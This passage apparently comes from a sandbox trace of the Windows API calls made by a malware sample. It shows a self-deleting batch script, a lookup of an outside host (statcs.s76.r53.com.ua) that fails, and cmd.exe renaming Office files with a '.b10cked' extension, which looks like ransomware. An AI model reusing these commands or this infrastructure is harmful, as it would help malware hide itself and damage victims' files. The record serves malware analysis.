\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0175.341] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0175.342] CloseHandle (hObject=0xe8) returned 1 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] GetCurrentThreadId () returned 0x728 [0175.343] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbf8, dwThreadId=0xbd8)) returned 1 [0175.357] CloseHandle (hObject=0xec) returned 1 [0175.357] CloseHandle (hObject=0xe8) returned 1 [0175.357] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.357] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 [0175.358] GetCurrentThreadId () returned 0x728 
[0175.358] WSACleanup () returned 0 [0175.375] FreeLibrary (hLibModule=0x77380000) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentProcess () returned 0xffffffff [0175.375] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0175.375] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] ResetEvent (hEvent=0x88) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] GetCurrentThreadId () returned 0x728 [0175.375] ResetEvent (hEvent=0x88) returned 1 [0175.375] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] CloseHandle (hObject=0x88) returned 1 [0175.376] CloseHandle (hObject=0x8c) returned 1 [0175.376] CloseHandle (hObject=0x84) returned 1 [0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetCurrentThreadId () returned 0x728 
[0175.376] GetCurrentThreadId () returned 0x728 [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] 
GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.376] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, 
wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, 
wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, 
wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xf, wMilliseconds=0xe2)) [0175.377] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.379] FreeLibrary (hLibModule=0x76910000) returned 1 [0175.379] LocalFree (hMem=0x2c4448) returned 0x0 [0175.379] FreeLibrary (hLibModule=0x76910000) returned 1 [0175.379] LocalFree (hMem=0x2c4438) returned 0x0 [0175.379] ExitProcess (uExitCode=0x0) Thread: id = 414 os_tid = 0xde8 [0175.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0175.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x193ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0175.058] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x193fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x193fbac | out: ppResult=0x193fbac*=0x0) returned 11001 [0175.214] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x193fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x193fbac | out: ppResult=0x193fbac*=0x0) returned 11001 [0175.330] getnameinfo (in: pSockaddr=0x193fc14, SockaddrLength=0x0, pNodeBuffer=0x135bc7c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0175.330] htons (hostshort=0x0) returned 0x0 [0175.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0175.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] 
GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] SetEvent (hEvent=0x84) returned 1 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] GetCurrentThreadId () returned 0xde8 [0175.330] CloseHandle (hObject=0xb8) returned 1 [0175.330] RtlExitUserThread (Status=0x0) Thread: id = 415 os_tid = 0xe08 Process: id = "311" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 